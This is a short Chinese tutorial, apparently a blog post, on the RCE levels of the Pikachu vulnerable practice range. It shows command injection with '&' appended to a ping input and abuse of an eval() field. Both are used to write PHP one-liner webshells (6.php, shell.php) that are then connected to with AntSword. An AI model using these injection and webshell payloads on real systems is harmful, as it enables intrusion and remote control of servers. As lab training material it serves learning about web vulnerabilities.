Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
zhanghaofaowhrql4 小时前
Cursor+GitOps:自动化运维新姿势
运维·自动化
weixin_471383036 小时前
Docker - 05 - 构建流程
运维·docker·容器
风中芦苇啊6 小时前
从直接生成到受控配置:新一代图表Agent的SQL安全生成范式
数据库·sql·安全
泛普软件6 小时前
企业项目管理软件如何选型?统筹多项目资源把控交付与盈利水平
大数据·安全
夏玉林的学习之路7 小时前
如何远程连接服务器
运维·服务器
风曦Kisaki7 小时前
#Linux数据库管理Day06:主从同步与MaxScale读写分离
linux·运维·数据库
影寂ldy8 小时前
C# try-catch 异常处理全套笔记
服务器·数据库·c#
fei_sun8 小时前
黑洞路由(Null Route/空接口路由)
服务器·前端·javascript
Tipriest_8 小时前
ubuntu创建和更换当前swap大小
linux·运维·ubuntu
雨辰AI8 小时前
生产级实战:人大金仓 V9 标准化运维手册(日常巡检 + 监控告警 + 应急处置)
java·运维·数据库·后端